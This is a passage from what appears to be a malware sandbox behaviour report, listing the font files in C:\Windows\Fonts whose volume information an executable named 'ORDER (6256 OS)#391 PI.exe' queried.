        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
        Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
